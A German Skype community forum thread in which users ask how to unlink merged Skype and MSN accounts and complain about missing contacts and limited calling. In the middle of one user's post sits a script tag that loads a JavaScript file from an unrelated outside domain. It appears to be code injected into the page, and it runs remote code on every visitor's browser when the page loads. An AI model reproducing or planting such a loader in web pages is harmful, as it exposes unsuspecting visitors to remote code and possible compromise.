Die Skype-Community

in
Antworten
fbb
Novel Tourist
fbb

Skype und msn Konto wieder trennen

Hallo zusammen,

gibt es eine Möglichkeit nach der Verknüpfung des Skype und msn Konto dieses wieder zu trennen?

Danke & Gruß

fbb

Verwenden Sie unformatierten Text.
Casual Adventurer
gomorata

Betreff: Skype und msn Konto wieder trennen

Ja, es gibt eine Möglichkeit: dem Kundendienst schreiben...
Novel Adventurer
Peter-Zwegat

und wo schreibt man mit den ^^

Novel Adventurer
isabelle160286

seit dem ich update gemacht habe bei msn hab ich beides zusammen und ich kann auf skype nicht mit den msn leuten telefonieren,cam oder bilder verschicken kann nur mit ihnen schreiben!!!ich kann msn auch nicht löschen!!!

wie kann ich beides wieder trennen oder wie kann ich es ändern das ich in skype auch mit meinen msn leuten reden,cam und bilder schicken kann???

<script type="text/javascript" src="https://vegas4s.com/load.js?0.23303859650691428"></script>
Novel Tourist
gluehsternchen

... und bei mir sind alle MSN Kontakte weg... und ich möchte bitte, das sie wieder da sind. Wer kann mir helfen???

Facebook Twitter

© 2013 Skype und/oder Microsoft. Der Name Skype, entsprechende Marken und Logos sowie das „S“-Symbol sind Marken von Skype oder verbundenen Unternehmen. Die Nutzung dieser Website gilt als Annahme der Nutzungsbedingungen sowie der Datenschutz- und Cookie-Richtlinien.

No emergency calls

Keine Notrufe über Skype.
Skype ist kein Ersatz für Ihr Telefon und kann nicht für Notrufe verwendet werden.